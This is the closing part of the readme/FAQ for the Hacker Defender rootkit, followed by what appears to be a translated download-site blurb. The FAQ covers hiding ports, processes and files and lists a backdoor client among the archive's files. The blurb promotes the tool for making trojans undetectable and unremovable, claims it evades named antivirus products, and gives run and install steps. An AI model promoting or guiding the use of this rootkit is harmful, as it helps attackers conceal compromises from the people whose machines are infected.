22) Q: I really love this program. Can I support your work with a little donation?
A: We don't need it, but we would be glad if you gave your money to a charity in your country and wrote us a mail about it.
23) Q: Is there any chance to hide C:\temp and not hide C:\winnt\temp?
A: No. Create your own directory with a specific name and put it in Hidden Table.
24) Q: I can see the password in the inifile is plaintext! How is this possible?
A: You might think this is an insecure way to store the password, but if you hide your inifile nobody can read it, so it is secure. Note that it is only hidden while hxdef is running: the answer to question 1 relies on reading it after booting from CD. It is also easy to change at any time, and you can use -:refresh to apply the new password.
25) Q: If I have a process that is in Hidden Table and it listens on a port, will this port be hidden automatically or should I put it in Hidden Ports?
A: The only hidden ports are those in the Hidden Ports list. So yes, you should put it in Hidden Ports.
=====[ 8. Files ]===============================================================
The original archive of Hacker defender v0.8.4 contains these files:
hxdef084.exe     70 144 b - program Hacker defender v0.8.4
hxdef084.ini      3 872 b - inifile with default settings
hxdef084.2.ini    3 695 b - inifile with default settings, variant 2
bdcli084.exe     26 624 b - backdoor client
rdrbs084.exe     49 152 b - redirectors base
readmecz.txt     34 639 b - Czech version of readme file
readmeen.txt     35 174 b - this readme file
===================================[ End ]======================================
Software description: Hacker Defender (Chinese name 黑客守卫者) is a kernel-level backdoor. With it you can hide files, processes, system services, system drivers, registry keys and values and open ports, and fake the free disk space. It also masks the changes it made in memory and invisibly controls the hidden processes. It installs a hidden backdoor, registers a hidden system service and installs a system driver. The backdoor technique allows a redirector to be deployed. Because of the number of parameters it is not recommended for beginners; detailed Chinese instructions are included.
One more remark: Hacker Defender played an important role in the Half-Life 2 source code leak; how exactly, work it out for yourselves...
You can use this program to make your own trojans undetectable; even if they were detected before, after using hxdef they can no longer be removed. It is the simplest way to evade detection, and the instructions explain how.
By the way, KV cannot find its driver at all... KV has gotten weak; Rising can only detect it in memory, not remove it; Kaspersky stays silent.
When the program starts it shows a warning that the driver is invalid; ignore it. To check whether the program is running, create a new file "hxdef.txt" and see whether it disappears. If it has disappeared, the program is working normally.
The program was tested on Windows 2000 Professional and Windows XP Professional.
It currently evades all domestic antivirus products.
Additional notes: install.bat is the default install/start script; uninstall.bat is the default uninstall script.
Opening hxdef.exe directly does nothing; you must use the command "hxdef.exe configfile.ini".
After running it, hxdef.exe and hxdef.ini disappear, which shows that the program is running normally.
After uninstalling, the files reappear.